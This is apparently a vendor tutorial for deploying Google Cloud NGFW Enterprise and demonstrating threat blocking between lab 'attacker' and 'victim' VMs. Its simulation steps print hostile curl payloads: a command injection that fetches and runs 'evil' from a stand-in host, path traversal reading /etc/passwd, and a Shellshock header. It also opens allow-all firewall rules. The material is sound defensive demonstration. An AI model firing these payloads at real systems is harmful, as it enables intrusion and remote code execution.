google-cloud-ngfw-tutorial 
Google Cloud NGFW Enterprise Tutorial
This tutorial shows how to deploy and use Google Cloud NGFW Enterprise, a native Google Cloud service powered by Palo Alto Networks Threat Prevention technologies.
Cloud NGFW Enterprise is a fully distributed firewall service with advanced protection capabilities, micro-segmentation, and pervasive coverage to protect your Google Cloud workloads from internal and external threats, including: intrusion, malware, spyware, and command-and-control. The service works by creating Google-managed zonal firewall endpoints that use packet intercept technology to transparently inspect the workloads for the configured threat signatures and protect them against threats.
[!NOTE]
Cloud NGFW Enterprise is currently in public preview.
Requirements
- Familiarize yourself with the Cloud NGFW Enterprise.
- A valid
gcloud(SDK447.0.0or greater) installation or access to Google Cloud Shell. - A Google Cloud project to host the deployment.
- A Google Cloud billing project.
- Elevated access to a Google Cloud organization.
Topology
Below is a diagram of the tutorial.
A VPC network contains two virtual machines (attacker and victim) that are used to simulate threats. Each virtual machine has an external address associated with its network interface to provide internet connectivity.
When Cloud NGFW is enabled, Google Cloud firewall rules intercept VPC network traffic (including north-south and east-west) and redirect it to the firewall endpoint for inspection. All actions taken by the service are logged directly in the Google Cloud console for you.
Prepare for deployment
Prepare for deployment by enabling the required APIs, retrieving the deployment files, and configuring the environment variables.
[!IMPORTANT]
This tutorial assumes you are using Cloud Shell to provision all of the resources.
-
Open Google Cloud Shell and enable the required APIs.
gcloud services enable compute.googleapis.com gcloud services enable networksecurity.googleapis.com -
List your Organization ID(s).
gcloud organizations list
-
Set the desired Organization ID to the environment variable
ORG_ID. -
List your projects within your selected organization.
gcloud alpha projects list --organization=$ORG_ID -
Set your desired deployment Project ID to the environment variable
PROJECT_ID.
-
Set your deployment Project ID to your
gcloudconfiguration.gcloud config set project $PROJECT_ID -
Set your Gooogle Cloud billing Project ID to the environment variable
BILLING_PROJECT_ID. -
Set values for the deployment's
REGION,ZONE, and namingPREFIX.
[!NOTE]
prefixis a string of characters that is prepended to the name of each created resource.
- Select a deployment option. Both options deploy identical environments.
Option 1. Scripted Deployment
- All of the cloud resources required for the tutorial are deployed using a single script.
- Best for users who are familiar with Cloud NGFW Enterprise and want to quickly test use-cases.
Option 2. Step-by-step Deployment
- Each cloud resource is deployed individually through
gcloud.
- Best for users who are new to Cloud NGFW Enterprise or want control over which resources are deployed.
Scripted Deployment
-
In Cloud Shell, clone the repository and change directories.
git clone https://github.com/PaloAltoNetworks/google-cloud-ngfw-enterprise-tutorial cd google-cloud-ngfw-enterprise-tutorial -
Execute the script to create the environment.
./ips_create.sh -
When the script completes, proceed to Simulate Threats.
[!IMPORTANT]
The script can take up to 45 minutes to complete.
Step-by-Step Deployment
-
In Cloud Shell, create a VPC network, subnetwork, and firewall rule to allow all ingress traffic.
gcloud compute networks create $PREFIX-vpc \ --subnet-mode=custom \ --project=$PROJECT_ID gcloud compute networks subnets create $PREFIX-subnet \ --network=$PREFIX-vpc \ --range=10.0.0.0/24 \ --region=$REGION \ --project=$PROJECT_ID gcloud compute firewall-rules create $PREFIX-all-ingress \ --network=$PREFIX-vpc \ --direction=ingress \ --allow=all \ --source-ranges=0.0.0.0/0 \ --project=$PROJECT_ID -
Create two virtual machines (
attacker&victim). The machines will be used to simulate threats later.gcloud compute instances create $PREFIX-attacker \ --zone=$ZONE \ --machine-type=f1-micro \ --image-project=ubuntu-os-cloud \ --image-family=ubuntu-2004-lts \ --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.10 \ --project=$PROJECT_ID gcloud compute instances create $PREFIX-victim \ --zone=$ZONE\ --machine-type=f1-micro \ --image-project=panw-gcp-team-testing \ --image=debian-cloud-ids-victim \ --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.20 \ --project=$PROJECT_ID -
Create a security profile and a security profile group.
gcloud beta network-security security-profiles threat-prevention create $PREFIX-profile \ --location=global \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --quiet gcloud beta network-security security-profile-groups create $PREFIX-profile-group \ --threat-prevention-profile "organizations/$ORG_ID/locations/global/securityProfiles/$PREFIX-profile" \ --location=global \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --quiet:bulb: Objective Security profiles define layer 7 inspection policies for Google Cloud resources, offering application layer services like intrusion prevention through firewall endpoints. Security profile groups serve as a container for these profiles and are referenced within firewall policies to redirect network traffic.
-
Set the security profile's action to
ALERTfor threat severities categorized asINFORMATIONALandLOW, while setting it toBLOCKfor those categorized asMEDIUM,HIGH, andCRITICAL.gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \ --severities=INFORMATIONAL,LOW \ --action=ALERT \ --location=global \ --organization=$ORG_ID \ --project=$PROJECT_ID gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \ --severities=MEDIUM,HIGH,CRITICAL \ --action=DENY \ --location=global \ --organization=$ORG_ID \ --project=$PROJECT_ID:bulb: Objective Each severity level has an associated default action. The default action specifies the action to take against threats based on the threat's severity level. You can use security profiles to override the default action for a severity level.
-
Create a firewall endpoint. The endpoint can take up to 25 minutes to fully provision.
gcloud beta network-security firewall-endpoints create $PREFIX-endpoint \ --zone=$ZONE \ --billing-project=$BILLING_PROJECT_ID \ --organization=$ORG_ID \ --quiet while true; do STATUS_EP=$(gcloud beta network-security firewall-endpoints describe $PREFIX-endpoint \ --zone=$ZONE \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --format="json" | jq -r '.state') if [[ "$STATUS_EP" == "ACTIVE" ]]; then echo "Firewall endpoint $PREFIX-endpoint is now active." sleep 2 break fi echo "Waiting for the firewall endpoint to be created. This can take up to 25 minutes..." sleep 5 done:bulb: Objective A firewall endpoint is a organizational resource that inspect intercepted traffic with Palo Alto Networks Threat Prevention technologies.
-
Associate the endpoint with the VPC network. The association can take up to 30 minutes to complete.
gcloud beta network-security firewall-endpoint-associations create $PREFIX-assoc \ --endpoint "organizations/$ORG_ID/locations/$ZONE/firewallEndpoints/$PREFIX-endpoint" \ --network=$PREFIX-vpc \ --zone=$ZONE \ --project=$PROJECT_ID \ --quiet while true; do STATUS_ASSOC=$(gcloud beta network-security firewall-endpoint-associations describe $PREFIX-assoc \ --zone=$ZONE \ --project=$PROJECT_ID \ --format="json" | jq -r '.state') if [[ "$STATUS_ASSOC" == "ACTIVE" ]]; then echo "Endpoint association $PREFIX-assoc is now active." sleep 2 break fi echo "Waiting for the endpoint association to be created. This can take up to 45 minutes..." sleep 1 done:bulb: Objective The firewall endpoint can be associated with one or more VPC networks within the same zone. If a firewall policy attached to your VPC network has layer 7 inspection enabled, matching traffic is transparently redirected to the endpoint for inspection.
-
Create a Network Firewall Policy with two firewall rules to allow all ingress & egress traffic to the workload network.
gcloud compute network-firewall-policies create $PREFIX-global-policy \ --global \ --project=$PROJECT_ID gcloud compute network-firewall-policies rules create 10 \ --action=allow \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --direction=INGRESS \ --enable-logging \ --layer4-configs all \ --src-ip-ranges=0.0.0.0/0 \ --dest-ip-ranges=0.0.0.0/0 \ --project=$PROJECT_ID gcloud compute network-firewall-policies rules create 11 \ --action=allow \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --layer4-configs=all \ --direction=EGRESS \ --enable-logging \ --src-ip-ranges=0.0.0.0/0 \ --dest-ip-ranges=0.0.0.0/0 \ --project=$PROJECT_ID:bulb: Objective A Network Firewall Policy can be shared across networks within a Google Cloud organization. This simplifies the configuration and management of firewall rules. The firewall policies created, do not redirect traffic to the firewall endpoint. This will be done later in the tutorial.
-
Associate the Network Firewall Policy with the VPC network that contains the workload machines.
gcloud compute network-firewall-policies associations create \ --firewall-policy=$PREFIX-global-policy \ --network=$PREFIX-vpc \ --name=$PREFIX-global-policy-association \ --global-firewall-policy \ --project=$PROJECT_ID:bulb: Objective A Network Firewall Policy is an organizational resource, enabling you to apply policies across networks, projects, and folders.
-
(Optional) Review the created resources:
Simulate threats without Cloud NGFW Enterprise
Simulate threats between the attacker and victim virtual machines without Cloud NGFW inspection. Deep packet inspection does not occur because the firewall policies created in the previous step do not intercept traffic for inspection by the firewall endpoint.
-
In Cloud Shell, open an SSH session to the
attackerVM.gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID -
From the
attackerVM, simulate sudo-threats to thevictim(10.0.0.20) VM.curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil" curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5 curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5 curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5 -
Attempt to download a sudo malicious file from the internet.
wget www.eicar.eu/eicar.com.txt --tries 1 --timeout 2:bulb: Objective The above threat simulations should be successful. This is because the firewall endpoint is not inspecting the traffic between the
attackerandvictimvirtual machines.
Prevent threats with Cloud NGFW Enterprise
Cloud NGFW Enterprise uses Google Cloud's packet intercept technology to transparently redirect traffic from workloads to firewall endpoints. Traffic redirection is defined within network firewall rules which have the security profile group set as the action.
Update network firewall policies
Update the network firewall policies to redirect traffic to the firewall endpoint. The action defined in the firewall rule determines which security profile group is applied to the traffic.
-
Modify the ingress & egress firewall rules within the global network policy to intercept traffic to the firewall endpoint.
gcloud beta compute network-firewall-policies rules update 10 \ --action=apply_security_profile_group \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --project=$PROJECT_ID \ --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group gcloud beta compute network-firewall-policies rules update 11 \ --action=apply_security_profile_group \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --project=$PROJECT_ID \ --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group
Replay threats
Simulate the previous threats again to see the action taken by Cloud NGFW.
-
In Cloud Shell, open an SSH session to the
attackerVM (password:kali).gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID -
From the
attackerVM, simulate sudo-threats to thevictim(10.0.0.20) VM.curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil" curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5 curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5 curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5 -
Attempt to download a sudo-malicious file from the internet.
wget www.eicar.eu/eicar.com.txt --tries 1 --timeout 2:bulb: Objective The simulated threats from the
attackershould fail. This is because the Cloud NGFW service is preventing the threats from reaching thevictimmachine.
View threats
View the actions taken by the Cloud NGFW service directly within the Google Cloud console.
-
In the Google Cloud console, go to Network Security → Threats.
:bulb: Objective You should see the actions taken by the firewall endpoint, indicating the service has detected and/or stopped the simulated threats.
The action taken against a threat is determined by the security profile group applied to the network firewall rule.
Clean up
To delete the created resources, delete your Google Cloud deployment project. If you cannot delete your deployment project, follow the steps below to delete the cloud resources created in this tutorial.
-
If you chose the Step-by-Step Deployment, clone the repository in Cloud Shell.
git clone https://github.com/PaloAltoNetworks/google-cloud-ngfw-enterprise-tutorial cd google-cloud-ngfw-enterprise-tutorial -
Execute the script to delete the resources created in this tutorial.
./ips_delete
More Information
Please see the materials below for more information about the topics discussed in this tutorial.